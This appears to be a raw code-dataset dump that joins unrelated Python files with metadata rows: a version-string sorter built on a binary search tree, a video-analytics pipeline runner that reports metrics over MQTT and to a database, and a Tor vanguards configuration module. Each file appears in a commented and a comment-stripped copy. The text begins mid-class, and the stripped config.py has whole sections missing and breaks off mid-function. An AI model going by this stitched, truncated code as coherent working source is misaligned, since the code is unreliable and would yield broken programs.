        self.father = father

    def isBefore(self, n):
        """Return True if this node's version sorts strictly before n."""
        mine = [int(part) for part in self.value.split('.')]
        theirs = [int(part) for part in n.split('.')]
        for ours, other in zip(mine, theirs):
            if ours != other:
                return ours < other
        # All shared components are equal: the shorter version comes first.
        return len(mine) < len(theirs)

    def printSub(self):
        """Return the in-order traversal (sorted versions) of this subtree."""
        ordered = []
        if self.left is not None:
            ordered.extend(self.left.printSub())
        ordered.append(self.value)
        if self.right is not None:
            ordered.extend(self.right.printSub())
        return ordered
class Tree:
    """Unbalanced binary search tree of version strings.

    Ordering comes from node.isBefore(); an in-order traversal therefore
    yields the stored versions in ascending order.
    """
    root = None  # class-level default; set per-instance on first insert
    def insert(self, v):
        """Insert version string v, keeping the in-order walk sorted.

        Fix: the original loop contained an unreachable `if current is None`
        branch (we only ever descend into non-None children) which, had it
        ever run, would also have failed to link the new node into the tree.
        It has been removed.
        """
        if self.root is None:
            self.root = node(v, None)
            print('insert root: ' +v)
            return
        current = self.root
        while True:
            if current.isBefore(v):
                # v sorts after current: descend right.
                if current.right is None:
                    current.right = node(v, current)
                    return
                current = current.right
            else:
                # v sorts before (or equal to) current: descend left.
                if current.left is None:
                    current.left = node(v, current)
                    return
                current = current.left
    def printTree(self):
        """Return all stored versions ascending, or None if the tree is empty."""
        if self.root is None:
            return None
        return self.root.printSub()
def answer(l):
    """Return the version strings in l sorted ascending by numeric components.

    Versions compare major/minor/revision numerically; when one version is a
    prefix of another (e.g. "1" vs "1.0"), the shorter one sorts first.
    Python's list comparison gives exactly these semantics, so a plain sort
    with a list-of-ints key replaces the original hand-rolled unbalanced BST
    (and its stray debug print), and returns [] instead of None for an empty
    input list.
    """
    return sorted(l, key=lambda v: [int(part) for part in v.split('.')])
| 40.490741 | 707 | 0.576263 |
class node:
    """One BST node holding a version string; ordering defined by isBefore()."""
    # Class-level defaults; __init__ sets value/father, tree code sets children.
    left = None
    right = None
    father = None
    value = ''
    def __init__(self, v, father):
        self.value = v
        self.father = father
    def isBefore(self, n):
        """Return True if this node's version sorts strictly before version n."""
        # Compare the shared numeric components left to right.
        lc = self.value.split('.')
        ln = n.split('.')
        for i in range(0, min(len(lc), len(ln))):
            if int(lc[i]) == int(ln[i]):
                continue
            if int(lc[i]) > int(ln[i]):
                return False
            if int(lc[i]) < int(ln[i]):
                return True
        # All shared components equal: the shorter version sorts first
        # (e.g. "1" before "1.0").
        if len(lc) < len(ln):
            return True
        else:
            return False
    def printSub(self):
        """Return the in-order traversal (sorted versions) of this subtree."""
        result = []
        if self.left is not None:
            result = result + self.left.printSub()
        result = result + [self.value]
        if self.right is not None:
            result = result + self.right.printSub()
        return result
class Tree:
    """Unbalanced binary search tree of version strings (see node.isBefore)."""
    # Class-level default; overwritten per instance on the first insert.
    root = None
    def insert(self, v):
        """Insert version string v so that an in-order walk stays sorted."""
        if self.root == None:
            self.root = node(v, None)
            print('insert root: ' +v)
            return
        current = self.root
        while True:
            # NOTE(review): unreachable — current is only ever advanced into
            # non-None children below, so it can never be None here; this
            # branch would also fail to link the new node into the tree.
            if current is None:
                current = node(v, current)
                return
            if current.isBefore(v):
                # v sorts after current: descend right.
                if current.right is None:
                    current.right = node(v, current)
                    return
                else:
                    current = current.right
            else:
                # v sorts before (or equal to) current: descend left.
                if current.left is None:
                    current.left = node(v, current)
                    return
                else:
                    current = current.left
    def printTree(self):
        """Return all stored versions ascending, or None if the tree is empty."""
        if self.root is None:
            return None
        else:
            return self.root.printSub()
def answer(l):
    """Return the version strings of l sorted ascending (BST in-order walk)."""
    myTree = Tree()
    for v in l:
        myTree.insert(v)
    return myTree.printTree()
| true | true |
1c333855ffae6255eb2af9e2088e8ddac49d027a | 8,938 | py | Python | analytics/common/runva.py | dhaval-zala/smart_city_ | c555253b57c442cb27e1e5a642cce25ae8bfa564 | [
"BSD-3-Clause"
] | null | null | null | analytics/common/runva.py | dhaval-zala/smart_city_ | c555253b57c442cb27e1e5a642cce25ae8bfa564 | [
"BSD-3-Clause"
] | null | null | null | analytics/common/runva.py | dhaval-zala/smart_city_ | c555253b57c442cb27e1e5a642cce25ae8bfa564 | [
"BSD-3-Clause"
] | 1 | 2022-03-23T12:07:41.000Z | 2022-03-23T12:07:41.000Z | #!/usr/bin/python3
from db_common import DBCommon
from db_query import DBQuery
from paho.mqtt.client import Client
from db_ingest import DBIngest
from threading import Event
from vaserving.vaserving import VAServing
from vaserving.pipeline import Pipeline
from configuration import env
import time
import traceback
import psutil
# Deployment settings pulled from the environment at import time (via
# configuration.env); a missing variable raises KeyError immediately.
mqtthost = env["MQTTHOST"]            # MQTT broker host for analytics output
dbhost = env["DBHOST"]                # DB host for algorithm/config indexes
dbmhost = env["DBMHOST"]              # DB host for the "activity" metrics index
every_nth_frame = int(env["EVERY_NTH_FRAME"])  # inference frame-skip interval
office = list(map(float, env["OFFICE"].split(",")))  # [lat, lon] of this office
class RunVA(object):
    """Runs one VA Serving pipeline for a sensor and reports its health.

    Responsibilities:
      * probe the MQTT broker until it is reachable,
      * start the named pipeline publishing analytics to MQTT,
      * poll pipeline status every 3s, pushing performance records into the
        "algorithms" index and per-bot activity records into "activity",
        until stop() is called or the pipeline ends on its own.
    """
    def _test_mqtt_connection(self):
        # Readiness probe: block (retrying every 5s) until the broker
        # accepts a connection, then disconnect immediately.
        print("testing mqtt connection", flush=True)
        mqtt = Client()
        while True:
            try:
                mqtt.connect(mqtthost)
                break
            except:
                print("Waiting for mqtt...", flush=True)
                time.sleep(5)
        print("mqtt connected", flush=True)
        mqtt.disconnect()
    def __init__(self, pipeline, version="2", stop=Event()):
        # NOTE(review): the default Event() is created once at class
        # definition time and shared by all instances constructed without an
        # explicit `stop` argument — confirm this sharing is intended.
        super(RunVA, self).__init__()
        self._test_mqtt_connection()
        self._pipeline = pipeline
        self._version = version
        # Health records go to "algorithms" (dbhost); per-poll activity
        # metrics go to "activity" (dbmhost).
        self._db = DBIngest(host=dbhost, index="algorithms", office=office)
        self._db_activity = DBIngest(host = dbmhost, index="activity", office=office)
        self._stop=stop
    def stop(self):
        # Signal the polling loop in loop() to exit.
        print("stopping", flush=True)
        self._stop.set()
    def loop(self, sensor, location, uri, algorithm, algorithmName, options={}, topic="analytics"):
        # Start the pipeline for `uri` and poll it until stopped.
        # NOTE(review): `options={}` is a mutable default argument; it is
        # only read here (parameters.update), but confirm callers never
        # mutate it.
        try:
            VAServing.start({
                'model_dir': '/home/models',
                'pipeline_dir': '/home/pipelines',
                'max_running_pipelines': 1,
            })
            try:
                # Pipeline wiring: read from the sensor URI, publish
                # analytics over MQTT on `topic`.
                source={
                    "type": "uri",
                    "uri": uri,
                }
                destination={
                    "type": "mqtt",
                    "host": mqtthost,
                    "clientid": algorithm,
                    "topic": topic
                }
                tags={
                    "sensor": sensor,
                    "location": location,
                    "algorithm": algorithmName,
                    "office": {
                        "lat": office[0],
                        "lon": office[1]
                    },
                }
                parameters = {
                    "inference-interval": every_nth_frame,
                    "recording_prefix": "/tmp/rec/" + sensor
                }
                parameters.update(options)
                pipeline = VAServing.pipeline(self._pipeline, self._version)
                # NOTE(review): debug print left in place.
                print("pipelinepipeline", self._pipeline)
                instance_id = pipeline.start(source=source,
                                             destination=destination,
                                             tags=tags,
                                             parameters=parameters)
                if instance_id is None:
                    raise Exception("Pipeline {} version {} Failed to Start".format(
                        self._pipeline, self._version))
                self._stop.clear()
                # Poll every 3 seconds (see self._stop.wait(3) below) until
                # stop() is called or the pipeline terminates.
                while not self._stop.is_set():
                    status = pipeline.status()
                    print(status, flush=True)
                    if status.state.stopped():
                        print("Pipeline {} Version {} Instance {} Ended with {}".format(
                            self._pipeline, self._version, instance_id, status.state.name),
                            flush=True)
                        break
                    if status.avg_fps > 0 and status.state is Pipeline.State.RUNNING:
                        # Latency may be None before the first measurement.
                        avg_pipeline_latency = status.avg_pipeline_latency
                        if not avg_pipeline_latency: avg_pipeline_latency = 0
                        try:
                            # Update this algorithm's health record.
                            self._db.update(algorithm, {
                                "sensor": sensor,
                                "performance": status.avg_fps,
                                "latency": avg_pipeline_latency * 1000,
                                "cpu": psutil.cpu_percent(),
                                "memory": psutil.virtual_memory().percent,
                            })
                            try:
                                # For every bot configured on this sensor,
                                # resolve its display names and ingest one
                                # activity record.
                                dbb = DBQuery(host = dbhost, index = "botconfigs", office=office)
                                # print("sensorsensor",sensor)
                                for botconfig in dbb.search("sensorId:'"+str(sensor)+"'"):
                                    activityId = botconfig["_source"]["activityId"]
                                    botId = botconfig["_source"]["botId"]
                                    kpisId = botconfig["_source"]["kpisId"]
                                    site_id = botconfig["_source"]["siteId"]
                                    nodeId = botconfig["_source"]["nodeId"]
                                    _dba = DBCommon(host = dbhost, index = "activities", office=office)
                                    activity_index = _dba.get(activityId)
                                    activity_name = activity_index["_source"]["uniqueName"]
                                    print("activity_nameactivity_name",activity_name)
                                    _dbb = DBCommon(host=dbhost, index="aividbots", office=office)
                                    aividbot_index = _dbb.get(botId)
                                    aividbot_name = aividbot_index["_source"]["name"]
                                    print("aividbot_nameaividbot_name",aividbot_name)
                                    _dbk = DBCommon(host=dbhost, index="kpis", office=office)
                                    kpi_index = _dbk.get(kpisId)
                                    kpi_name = kpi_index["_source"]["name"]
                                    print("kpi_namekpi_name",kpi_name)
                                    _dbs = DBCommon(host=dbhost, index="sites", office=office)
                                    site_index = _dbs.get(site_id)
                                    site_name = site_index["_source"]["name"]
                                    print("site_namesite_name",site_name)
                                    _dbn = DBCommon(host=dbhost, index="nodes", office=office)
                                    node_index = _dbn.get(nodeId)
                                    node_name = node_index["_source"]["name"]
                                    print("node_namenode_name",node_name)
                                    # NOTE(review): _dbs is reused here,
                                    # shadowing the "sites" client above.
                                    _dbs = DBCommon(host=dbhost, index="provisions", office=office)
                                    provision_index = _dbs.get(sensor)
                                    sensor_name = provision_index["_source"]["name"]
                                    print("sensor_namesensor_name",sensor_name)
                                    self._db_activity.ingest({
                                        "name": aividbot_name,
                                        "office": {
                                            "lat": office[0],
                                            "lon": office[1],
                                        },
                                        "status": "connected",
                                        "skip": every_nth_frame,
                                        "sensor": sensor,
                                        "performance": status.avg_fps,
                                        "latency": avg_pipeline_latency * 1000,
                                        "cpu": psutil.cpu_percent(),
                                        "memory": psutil.virtual_memory().percent,
                                        "activity_name":activity_name,
                                        "sensor_name":sensor_name,
                                        "aividbot_name":aividbot_name,
                                        "kpi_name":kpi_name,
                                        "site_name":site_name,
                                        "node_name":node_name,
                                        "timestamp":int(time.time()) * 1000
                                    })["_id"]
                            except Exception as error:
                                # Activity ingest is best-effort; log and
                                # keep polling.
                                print("wrong in activity ingest",error)
                        except:
                            # Health update failed: stop the loop and
                            # propagate to the outer handlers.
                            print("Failed to update algorithm status", flush=True)
                            self._stop.set()
                            raise
                    self._stop.wait(3)
                # NOTE(review): clearing _stop to None means a later stop()
                # call would raise AttributeError — confirm intended.
                self._stop=None
                pipeline.stop()
            except:
                print(traceback.format_exc(), flush=True)
                VAServing.stop()
        except:
            print(traceback.format_exc(), flush=True)
| 43.6 | 103 | 0.426046 |
from db_common import DBCommon
from db_query import DBQuery
from paho.mqtt.client import Client
from db_ingest import DBIngest
from threading import Event
from vaserving.vaserving import VAServing
from vaserving.pipeline import Pipeline
from configuration import env
import time
import traceback
import psutil
mqtthost = env["MQTTHOST"]
dbhost = env["DBHOST"]
dbmhost = env["DBMHOST"]
every_nth_frame = int(env["EVERY_NTH_FRAME"])
office = list(map(float, env["OFFICE"].split(",")))
class RunVA(object):
def _test_mqtt_connection(self):
print("testing mqtt connection", flush=True)
mqtt = Client()
while True:
try:
mqtt.connect(mqtthost)
break
except:
print("Waiting for mqtt...", flush=True)
time.sleep(5)
print("mqtt connected", flush=True)
mqtt.disconnect()
def __init__(self, pipeline, version="2", stop=Event()):
super(RunVA, self).__init__()
self._test_mqtt_connection()
self._pipeline = pipeline
self._version = version
self._db = DBIngest(host=dbhost, index="algorithms", office=office)
self._db_activity = DBIngest(host = dbmhost, index="activity", office=office)
self._stop=stop
def stop(self):
print("stopping", flush=True)
self._stop.set()
def loop(self, sensor, location, uri, algorithm, algorithmName, options={}, topic="analytics"):
try:
VAServing.start({
'model_dir': '/home/models',
'pipeline_dir': '/home/pipelines',
'max_running_pipelines': 1,
})
try:
source={
"type": "uri",
"uri": uri,
}
destination={
"type": "mqtt",
"host": mqtthost,
"clientid": algorithm,
"topic": topic
}
tags={
"sensor": sensor,
"location": location,
"algorithm": algorithmName,
"office": {
"lat": office[0],
"lon": office[1]
},
}
parameters = {
"inference-interval": every_nth_frame,
"recording_prefix": "/tmp/rec/" + sensor
}
parameters.update(options)
pipeline = VAServing.pipeline(self._pipeline, self._version)
print("pipelinepipeline", self._pipeline)
instance_id = pipeline.start(source=source,
destination=destination,
tags=tags,
parameters=parameters)
if instance_id is None:
raise Exception("Pipeline {} version {} Failed to Start".format(
self._pipeline, self._version))
self._stop.clear()
while not self._stop.is_set():
status = pipeline.status()
print(status, flush=True)
if status.state.stopped():
print("Pipeline {} Version {} Instance {} Ended with {}".format(
self._pipeline, self._version, instance_id, status.state.name),
flush=True)
break
if status.avg_fps > 0 and status.state is Pipeline.State.RUNNING:
avg_pipeline_latency = status.avg_pipeline_latency
if not avg_pipeline_latency: avg_pipeline_latency = 0
try:
self._db.update(algorithm, {
"sensor": sensor,
"performance": status.avg_fps,
"latency": avg_pipeline_latency * 1000,
"cpu": psutil.cpu_percent(),
"memory": psutil.virtual_memory().percent,
})
try:
dbb = DBQuery(host = dbhost, index = "botconfigs", office=office)
for botconfig in dbb.search("sensorId:'"+str(sensor)+"'"):
activityId = botconfig["_source"]["activityId"]
botId = botconfig["_source"]["botId"]
kpisId = botconfig["_source"]["kpisId"]
site_id = botconfig["_source"]["siteId"]
nodeId = botconfig["_source"]["nodeId"]
_dba = DBCommon(host = dbhost, index = "activities", office=office)
activity_index = _dba.get(activityId)
activity_name = activity_index["_source"]["uniqueName"]
print("activity_nameactivity_name",activity_name)
_dbb = DBCommon(host=dbhost, index="aividbots", office=office)
aividbot_index = _dbb.get(botId)
aividbot_name = aividbot_index["_source"]["name"]
print("aividbot_nameaividbot_name",aividbot_name)
_dbk = DBCommon(host=dbhost, index="kpis", office=office)
kpi_index = _dbk.get(kpisId)
kpi_name = kpi_index["_source"]["name"]
print("kpi_namekpi_name",kpi_name)
_dbs = DBCommon(host=dbhost, index="sites", office=office)
site_index = _dbs.get(site_id)
site_name = site_index["_source"]["name"]
print("site_namesite_name",site_name)
_dbn = DBCommon(host=dbhost, index="nodes", office=office)
node_index = _dbn.get(nodeId)
node_name = node_index["_source"]["name"]
print("node_namenode_name",node_name)
_dbs = DBCommon(host=dbhost, index="provisions", office=office)
provision_index = _dbs.get(sensor)
sensor_name = provision_index["_source"]["name"]
print("sensor_namesensor_name",sensor_name)
self._db_activity.ingest({
"name": aividbot_name,
"office": {
"lat": office[0],
"lon": office[1],
},
"status": "connected",
"skip": every_nth_frame,
"sensor": sensor,
"performance": status.avg_fps,
"latency": avg_pipeline_latency * 1000,
"cpu": psutil.cpu_percent(),
"memory": psutil.virtual_memory().percent,
"activity_name":activity_name,
"sensor_name":sensor_name,
"aividbot_name":aividbot_name,
"kpi_name":kpi_name,
"site_name":site_name,
"node_name":node_name,
"timestamp":int(time.time()) * 1000
})["_id"]
except Exception as error:
print("wrong in activity ingest",error)
except:
print("Failed to update algorithm status", flush=True)
self._stop.set()
raise
self._stop.wait(3)
self._stop=None
pipeline.stop()
except:
print(traceback.format_exc(), flush=True)
VAServing.stop()
except:
print(traceback.format_exc(), flush=True)
| true | true |
1c33391aac998ba80be1193d3b8412ce2e951685 | 8,400 | py | Python | src/vanguards/config.py | mikeperry-tor/vanguards | 10942de93f6578f8303f60014f34de2fca345545 | [
"MIT"
] | 132 | 2018-01-17T22:35:22.000Z | 2022-03-19T08:35:41.000Z | src/vanguards/config.py | mikeperry-tor/vanguards | 10942de93f6578f8303f60014f34de2fca345545 | [
"MIT"
] | 87 | 2018-05-25T23:20:24.000Z | 2022-02-02T08:41:08.000Z | src/vanguards/config.py | mikeperry-tor/vanguards | 10942de93f6578f8303f60014f34de2fca345545 | [
"MIT"
] | 22 | 2018-05-29T10:47:48.000Z | 2022-03-15T03:45:04.000Z | """ This file contains configuration defaults, options parsing, and config
file code.
"""
import argparse
import ipaddress
import os
import socket
import sys
from . import bandguards
from . import rendguard
from . import vanguards
from . import control
from . import logger
from .logger import plog
try:
from configparser import SafeConfigParser, Error
except ImportError:
from ConfigParser import SafeConfigParser, Error
################# Global options ##################
# Feature toggles: each switch enables one protection/monitoring component
# (see the matching modules imported above).
ENABLE_VANGUARDS=True
ENABLE_RENDGUARD=True
ENABLE_BANDGUARDS=True
ENABLE_LOGGUARD=True
ENABLE_CBTVERIFY=False
ENABLE_PATHVERIFY=False
# State file location
STATE_FILE = "vanguards.state"
# Config file location
_CONFIG_FILE = "vanguards.conf"
# Loglevel
LOGLEVEL = "NOTICE"
# Log to file instead of stdout
LOGFILE = ""
# If true, write/update vanguards to torrc and then exit
ONE_SHOT_VANGUARDS = False
# If true, circuits flagged by the checks are actually closed; this value is
# transferred to the control module by apply_config().
CLOSE_CIRCUITS = True
# Tor control connection settings: TCP address/port or unix socket, plus an
# optional control-port password.
CONTROL_IP = "127.0.0.1"
CONTROL_PORT = ""
CONTROL_SOCKET = ""
CONTROL_PASS = ""
# Reconnect attempt limit on failure (None means retry forever).
_RETRY_LIMIT = None
def setup_options():
  """Parse command-line options and apply them to this module's globals.

  Side effects: updates the module-level configuration globals, configures
  the log level/file, may write a generated config file and exit(0), and
  resolves a control hostname to an IPv4 address (exiting on failure).
  Returns the parsed argparse options object.
  """
  global CONTROL_IP, CONTROL_PORT, CONTROL_SOCKET, CONTROL_PASS, STATE_FILE
  global ENABLE_BANDGUARDS, ENABLE_RENDGUARD, ENABLE_LOGGUARD, ENABLE_CBTVERIFY
  global ENABLE_PATHVERIFY
  global LOGLEVEL, LOGFILE
  global ONE_SHOT_VANGUARDS, ENABLE_VANGUARDS
  parser = argparse.ArgumentParser()
  parser.add_argument("--state", dest="state_file",
                      default=os.environ.get("VANGUARDS_STATE", STATE_FILE),
                      help="File to store vanguard state")
  parser.add_argument("--generate_config", dest="write_file", type=str,
                      help="Write config to a file after applying command args")
  parser.add_argument("--loglevel", dest="loglevel", type=str,
                      help="Log verbosity (DEBUG, INFO, NOTICE, WARN, or ERROR)")
  parser.add_argument("--logfile", dest="logfile", type=str,
                      help="Log to LOGFILE instead of stdout")
  parser.add_argument("--config", dest="config_file",
                      default=os.environ.get("VANGUARDS_CONFIG", _CONFIG_FILE),
                      help="Location of config file with more advanced settings")
  parser.add_argument("--control_ip", dest="control_ip", default=CONTROL_IP,
                      help="The IP address of the Tor Control Port to connect to (default: "+
                      CONTROL_IP+")")
  parser.add_argument("--control_port", type=str, dest="control_port",
                      default=CONTROL_PORT,
                      help="The Tor Control Port to connect to (default: "+
                      "tries both 9050 and 9151)")
  parser.add_argument("--control_socket", dest="control_socket",
                      default=CONTROL_SOCKET,
                      help="The Tor Control Socket path to connect to "+
                      "(default: try /run/tor/control, then control port)")
  parser.add_argument("--control_pass", dest="control_pass",
                      default=CONTROL_PASS,
                      help="The Tor Control Port password (optional) ")
  parser.add_argument("--retry_limit", dest="retry_limit",
                      default=_RETRY_LIMIT, type=int,
                      help="Reconnect attempt limit on failure (default: Infinite)")
  parser.add_argument("--one_shot_vanguards", dest="one_shot_vanguards",
                      action="store_true",
                      help="Set and write layer2 and layer3 guards to Torrc and exit.")
  parser.add_argument("--disable_vanguards", dest="vanguards_enabled",
                      action="store_false",
                      help="Disable setting any layer2 and layer3 guards.")
  parser.set_defaults(vanguards_enabled=ENABLE_VANGUARDS)
  parser.add_argument("--disable_bandguards", dest="bandguards_enabled",
                      action="store_false",
                      help="Disable circuit side channel checks (may help performance)")
  # Bugfix: this keyword was misspelled "bandguards_eabled", so the
  # ENABLE_BANDGUARDS default was attached to a bogus attribute instead of
  # the real dest.
  parser.set_defaults(bandguards_enabled=ENABLE_BANDGUARDS)
  parser.add_argument("--disable_logguard", dest="logguard_enabled",
                      action="store_false",
                      help="Disable Tor log monitoring (may help performance)")
  parser.set_defaults(logguard_enabled=ENABLE_LOGGUARD)
  parser.add_argument("--disable_rendguard", dest="rendguard_enabled",
                      action="store_false",
                      help="Disable rendezvous misuse checks (may help performance)")
  parser.set_defaults(rendguard_enabled=ENABLE_RENDGUARD)
  parser.add_argument("--enable_cbtverify", dest="cbtverify_enabled",
                      action="store_true",
                      help="Enable Circuit Build Time monitoring")
  parser.set_defaults(cbtverify_enabled=ENABLE_CBTVERIFY)
  parser.add_argument("--enable_pathverify", dest="pathverify_enabled",
                      action="store_true",
                      help="Enable path selection monitoring")
  parser.set_defaults(pathverify_enabled=ENABLE_PATHVERIFY)
  options = parser.parse_args()
  # Copy the parsed values into the module-level globals in one shot.
  (STATE_FILE, CONTROL_IP, CONTROL_PORT, CONTROL_SOCKET, CONTROL_PASS,
   ENABLE_BANDGUARDS, ENABLE_RENDGUARD, ENABLE_LOGGUARD, ENABLE_CBTVERIFY,
   ENABLE_PATHVERIFY, ONE_SHOT_VANGUARDS, ENABLE_VANGUARDS) = \
    (options.state_file, options.control_ip, options.control_port,
     options.control_socket, options.control_pass,
     options.bandguards_enabled, options.rendguard_enabled,
     options.logguard_enabled,
     options.cbtverify_enabled, options.pathverify_enabled,
     options.one_shot_vanguards, options.vanguards_enabled)
  if options.loglevel is not None:
    LOGLEVEL = options.loglevel
  logger.set_loglevel(LOGLEVEL)
  if options.logfile is not None:
    LOGFILE = options.logfile
  if LOGFILE != "":
    logger.set_logfile(LOGFILE)
  if options.write_file is not None:
    config = generate_config()
    # Bugfix: close the generated file handle (it was previously leaked).
    with open(options.write_file, "w") as fh:
      config.write(fh)
    plog("NOTICE", "Wrote config to "+options.write_file)
    sys.exit(0)
  # If control_ip is a domain name, try to resolve it.
  if options.control_ip is not None:
    try:
      _ = ipaddress.ip_address(options.control_ip)
    except ValueError:
      try:
        # We're fine with AF_INET, stem supports only IPv4 addresses anyway.
        addr = socket.getaddrinfo(options.control_ip, None, socket.AF_INET,
                                  socket.SOCK_STREAM, socket.IPPROTO_TCP)
        CONTROL_IP = addr[0][4][0]
      except socket.gaierror:
        plog("ERROR", "Failed to resolve hostname "+options.control_ip)
        sys.exit(1)
  plog("DEBUG", "Applied command line options")
  return options
# Avoid a big messy dict of defaults. We already have them.
def get_option(config, section, option, default):
  """Read one option from config, coerced to the type of `default`.

  Booleans are stored as the strings "True"/"False", so they are compared
  against "True" rather than passed through bool() (which would be truthy
  for any non-empty string).  Any configparser Error (missing section or
  option, parse problems) yields `default`; a value that cannot be coerced
  (e.g. int("abc")) still raises, matching the original behavior.
  """
  try:
    if type(default) == bool:
      ret = config.get(section, option) == "True"
    else:
      ret = type(default)(config.get(section, option))
  except Error:
    # Fall back to the compiled-in default on any lookup failure.
    return default
  return ret
def get_options_for_module(config, module, section):
  """Load every UPPER_CASE attribute of `module` from `section` of `config`.

  Option names in the config file are the lowercased attribute names; the
  attribute's current value supplies both the fallback and the target type
  (see get_option).
  """
  for name in dir(module):
    if name.isupper() and name[0] != '_':
      fallback = getattr(module, name)
      setattr(module, name,
              get_option(config, section, name.lower(), fallback))
def set_options_from_module(config, module, section):
  """Snapshot every UPPER_CASE attribute of `module` into `section`.

  Creates the section and stores str(value) for each exported setting,
  mirroring the format read back by get_options_for_module().
  """
  config.add_section(section)
  exported = (n for n in dir(module) if n.isupper() and n[0] != '_')
  for name in exported:
    config.set(section, name, str(getattr(module, name)))
def generate_config():
  """Build a config parser populated with the current option values.

  One section per component: [Global] mirrors this module's UPPER_CASE
  globals, plus [Vanguards], [Bandguards], [Rendguard] and [Logguard].
  """
  config = SafeConfigParser(allow_no_value=True)
  set_options_from_module(config, sys.modules[__name__], "Global")
  set_options_from_module(config, vanguards, "Vanguards")
  set_options_from_module(config, bandguards, "Bandguards")
  set_options_from_module(config, rendguard, "Rendguard")
  # NOTE(review): "Logguard" is populated from the rendguard module — looks
  # like a copy/paste slip; confirm whether a logguard module was intended.
  set_options_from_module(config, rendguard, "Logguard")
  return config
def apply_config(config_file):
  """Read config_file and apply its settings to all vanguards modules.

  Loads the [Global] section into this module's globals and each component
  section into the matching module, then transfers the special-cased
  CLOSE_CIRCUITS flag to the control module.  Raises on a missing or
  unreadable file, as before.
  """
  config = SafeConfigParser(allow_no_value=True)
  # Bugfix: close the file handle deterministically (it was leaked before).
  # readfp() is kept for Python 2 compatibility (see the ConfigParser
  # import fallback at the top of this file).
  with open(config_file, "r") as fp:
    config.readfp(fp)
  get_options_for_module(config, sys.modules[__name__], "Global")
  get_options_for_module(config, vanguards, "Vanguards")
  get_options_for_module(config, bandguards, "Bandguards")
  get_options_for_module(config, rendguard, "Rendguard")
  # NOTE(review): "Logguard" is read into the rendguard module, mirroring
  # generate_config(); confirm whether a dedicated logguard module should
  # be used here instead.
  get_options_for_module(config, rendguard, "Logguard")
  # Special cased CLOSE_CIRCUITS option has to be transfered
  # to the control.py module
  setattr(control, "_CLOSE_CIRCUITS", CLOSE_CIRCUITS)
  # Bugfix: "successfilly" -> "successfully" in the log message.
  plog("NOTICE", "Vanguards successfully applied config options from "+
       config_file)
| 35.146444 | 115 | 0.686905 | import argparse
import ipaddress
import os
import socket
import sys
from . import bandguards
from . import rendguard
from . import vanguards
from . import control
from . import logger
from .logger import plog
try:
from configparser import SafeConfigParser, Error
except ImportError:
from ConfigParser import SafeConfigParser, Error
help="File to store vanguard state")
parser.add_argument("--generate_config", dest="write_file", type=str,
help="Write config to a file after applying command args")
parser.add_argument("--loglevel", dest="loglevel", type=str,
help="Log verbosity (DEBUG, INFO, NOTICE, WARN, or ERROR)")
parser.add_argument("--logfile", dest="logfile", type=str,
help="Log to LOGFILE instead of stdout")
parser.add_argument("--config", dest="config_file",
default=os.environ.get("VANGUARDS_CONFIG", _CONFIG_FILE),
help="Location of config file with more advanced settings")
parser.add_argument("--control_ip", dest="control_ip", default=CONTROL_IP,
help="The IP address of the Tor Control Port to connect to (default: "+
CONTROL_IP+")")
parser.add_argument("--control_port", type=str, dest="control_port",
default=CONTROL_PORT,
help="The Tor Control Port to connect to (default: "+
"tries both 9050 and 9151)")
parser.add_argument("--control_socket", dest="control_socket",
default=CONTROL_SOCKET,
help="The Tor Control Socket path to connect to "+
"(default: try /run/tor/control, then control port)")
parser.add_argument("--control_pass", dest="control_pass",
default=CONTROL_PASS,
help="The Tor Control Port password (optional) ")
parser.add_argument("--retry_limit", dest="retry_limit",
default=_RETRY_LIMIT, type=int,
help="Reconnect attempt limit on failure (default: Infinite)")
parser.add_argument("--one_shot_vanguards", dest="one_shot_vanguards",
action="store_true",
help="Set and write layer2 and layer3 guards to Torrc and exit.")
parser.add_argument("--disable_vanguards", dest="vanguards_enabled",
action="store_false",
help="Disable setting any layer2 and layer3 guards.")
parser.set_defaults(vanguards_enabled=ENABLE_VANGUARDS)
parser.add_argument("--disable_bandguards", dest="bandguards_enabled",
action="store_false",
help="Disable circuit side channel checks (may help performance)")
parser.set_defaults(bandguards_eabled=ENABLE_BANDGUARDS)
parser.add_argument("--disable_logguard", dest="logguard_enabled",
action="store_false",
help="Disable Tor log monitoring (may help performance)")
parser.set_defaults(logguard_enabled=ENABLE_LOGGUARD)
parser.add_argument("--disable_rendguard", dest="rendguard_enabled",
action="store_false",
help="Disable rendezvous misuse checks (may help performance)")
parser.set_defaults(rendguard_enabled=ENABLE_RENDGUARD)
parser.add_argument("--enable_cbtverify", dest="cbtverify_enabled",
action="store_true",
help="Enable Circuit Build Time monitoring")
parser.set_defaults(cbtverify_enabled=ENABLE_CBTVERIFY)
parser.add_argument("--enable_pathverify", dest="pathverify_enabled",
action="store_true",
help="Enable path selection monitoring")
parser.set_defaults(pathverify_enabled=ENABLE_PATHVERIFY)
options = parser.parse_args()
(STATE_FILE, CONTROL_IP, CONTROL_PORT, CONTROL_SOCKET, CONTROL_PASS,
ENABLE_BANDGUARDS, ENABLE_RENDGUARD, ENABLE_LOGGUARD, ENABLE_CBTVERIFY,
ENABLE_PATHVERIFY, ONE_SHOT_VANGUARDS, ENABLE_VANGUARDS) = \
(options.state_file, options.control_ip, options.control_port,
options.control_socket, options.control_pass,
options.bandguards_enabled, options.rendguard_enabled,
options.logguard_enabled,
options.cbtverify_enabled, options.pathverify_enabled,
options.one_shot_vanguards, options.vanguards_enabled)
if options.loglevel != None:
LOGLEVEL = options.loglevel
logger.set_loglevel(LOGLEVEL)
if options.logfile != None:
LOGFILE = options.logfile
if LOGFILE != "":
logger.set_logfile(LOGFILE)
if options.write_file != None:
config = generate_config()
config.write(open(options.write_file, "w"))
plog("NOTICE", "Wrote config to "+options.write_file)
sys.exit(0)
if options.control_ip != None:
try:
_ = ipaddress.ip_address(options.control_ip)
except ValueError:
try:
addr = socket.getaddrinfo(options.control_ip, None, socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)
CONTROL_IP = addr[0][4][0]
except socket.gaierror:
plog("ERROR", "Failed to resolve hostname "+options.control_ip)
sys.exit(1)
plog("DEBUG", "Applied command line options")
return options
# Avoid a big messy dict of defaults. We already have them.
def get_option(config, section, option, default):
try:
if type(default) == bool:
ret = config.get(section, option) == "True"
else:
ret = type(default)(config.get(section, option))
except Error as e:
return default
return ret
def get_options_for_module(config, module, section):
for param in dir(module):
if param.isupper() and param[0] != '_':
val = getattr(module, param)
setattr(module, param,
get_option(config, section, param.lower(), val))
def set_options_from_module(config, module, section):
config.add_section(section)
for param in dir(module):
if param.isupper() and param[0] != '_':
val = getattr(module, param)
config.set(section, param, str(val))
def generate_config():
config = SafeConfigParser(allow_no_value=True)
